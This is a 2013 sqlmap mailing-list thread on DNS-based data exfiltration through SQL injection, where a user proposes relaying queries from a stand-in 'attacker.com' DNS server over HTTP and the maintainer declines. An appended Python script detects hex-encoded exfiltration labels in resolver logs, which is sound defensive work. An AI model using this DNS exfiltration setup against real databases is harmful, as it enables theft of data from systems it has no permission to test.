Thread: [sqlmap-users] feature request: offline mode for --dns-domain?
From: buawig <bu...@gm...> - 2013-04-16 21:30:04
Hi,

in cases where sqlmap is run against targets on internal networks it would be great if one could tell sqlmap to simply proceed without expecting incoming DNS requests, because sqlmap cannot be executed directly on the DNS server (which can't reach the target, but the target can reach the DNS server).

For me it would be enough to simply run something like

    -u ... --dns-domain=attacker.com --dns-port=0

(--dns-port does not exist [yet]) to let sqlmap know that it doesn't need to start a DNS listener.

I would then collect and decode the DNS queries on the DNS server manually, but I could also envision running a second sqlmap instance on the DNS server with --dns-domain (but without -u) doing that job.
From: Miroslav S. <mir...@gm...> - 2013-04-17 06:08:53
Hi.

Problem is that sqlmap needs to have data retrieved to be able to do its normal workflow. For example, if you do --dump sqlmap needs to know table columns. In your proposed case that would be problematic. Also, there are lots of cases when we ask the server a simple question and we need an answer to be able to proceed.

Also, in sqlmap DNS exfiltration works only if one other slower technique is available (e.g. time-based blind and/or boolean-based blind). In your proposed case that technique would need to be ignored completely - as it's automatically being used if DNS exfiltration fails.

Kind regards,
Miroslav Stampar
From: buawig <bu...@gm...> - 2013-04-17 17:12:49
> Problem is that sqlmap needs to have data retrieved to be able to do its normal workflow. For example, if you do --dump sqlmap needs to know table columns. In your proposed case that would be problematic. Also, there are lots of cases when we ask the server a simple question and we need an answer to be able to proceed.
>
> Also, in sqlmap DNS exfiltration works only if one other slower technique is available (e.g. time-based blind and/or boolean-based blind). In your proposed case that technique would need to be ignored completely - as it's automatically being used if DNS exfiltration fails.

Hi Miroslav,

thanks for your answer. Yes, I wouldn't expect sqlmap to work "as usual" in such a scenario, but the manual back and forth probably wouldn't be much fun.

An automated approach would be to make DNS queries reaching the DNS server available to sqlmap via HTTP, since the internal host running sqlmap can also reach the DNS server. A simple script on the DNS server could simply write incoming DNS queries to a file that can be fetched via HTTP from sqlmap.

So the request flow would be:

1) sqlmap host -> target
2) target makes DNS query to the attacker's DNS server
3) DNS server makes inbound queries available via HTTP, i.e. https://attacker.com/dnsqueries.txt (optionally protected via HTTP auth)
4) after (1) sqlmap fetches DNS queries from https://attacker.com/dnsqueries.txt

I realize that such an "internal" scenario might not be the most common setup, but nonetheless I wanted to share that problem and some thoughts about it.
From: Miroslav S. <mir...@gm...> - 2013-04-18 08:45:58
Hi.

I see your point, but this is more a case for some kind of PoC tool (and not sqlmap). Such a scenario would (IMO) involve one more step in an already non-simple setup. It's not that it doesn't make any sense, but it doesn't help an automated tool like sqlmap.

Kind regards,
Miroslav Stampar
--
Miroslav Stampar
http://about.me/stamparm
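As an added illustration of what the DNS exfiltration channel discussed in this thread looks like from the resolver side (this is not sqlmap code and not from anyone in the thread): a small Python detector that scans BIND-style query log lines and flags a client that sends several hex-encoded leading labels under one parent domain, decoding the labels so an analyst can see what left the database. The log lines, the hex labels, the two-label registrable_domain() simplification and the attacker.com domain are all constructed assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample resolver log lines (simplified BIND query-log format).
# The hex-looking leading labels mimic what an injection-driven DNS channel
# produces: a DBMS-side query result hex-encoded into a subdomain label.
SAMPLE_LOG = """\
17-Apr-2013 21:30:01 client 10.0.5.12#53111: query: www.example.com IN A
17-Apr-2013 21:30:02 client 10.0.5.12#53112: query: 61646d696e.pe1.attacker.com IN A
17-Apr-2013 21:30:03 client 10.0.5.12#53113: query: 726f6f74.pe2.attacker.com IN A
17-Apr-2013 21:30:04 client 10.0.5.12#53114: query: 7573657273.pe3.attacker.com IN A
17-Apr-2013 21:30:05 client 10.0.5.77#53115: query: mail.example.com IN MX
17-Apr-2013 21:30:06 client 10.0.5.12#53116: query: 70617373776f7264.pe4.attacker.com IN A
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<type>\S+)")
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{6,}$")  # long, purely hex label = suspicious


def registrable_domain(name):
    """Return the last two labels of a name (assumed simplification, no PSL lookup)."""
    parts = name.rstrip(".").split(".")
    return ".".join(parts[-2:])


def find_dns_exfil(log_text, min_hits=3):
    """Group hex-labelled queries by (client, parent domain) and keep the pairs
    that reach min_hits. Returns {(client, domain): [decoded label, ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        name = m.group("name")
        first = name.split(".")[0].lower()
        if not HEX_LABEL_RE.match(first) or len(first) % 2:
            continue  # not a well-formed hex label, leave it alone
        raw = bytes.fromhex(first)
        # Show the cleartext only when it is printable ASCII; otherwise keep the raw label.
        decoded = raw.decode("ascii") if all(32 <= b < 127 for b in raw) else first
        hits[(m.group("client"), registrable_domain(name))].append(decoded)
    return {key: labels for key, labels in hits.items() if len(labels) >= min_hits}


if __name__ == "__main__":
    for (client, domain), labels in find_dns_exfil(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: {labels}")
```

On real resolver logs the per-client grouping is what separates this from ordinary CDN or antispam hex hostnames, so raise min_hits rather than loosening the label pattern when tuning.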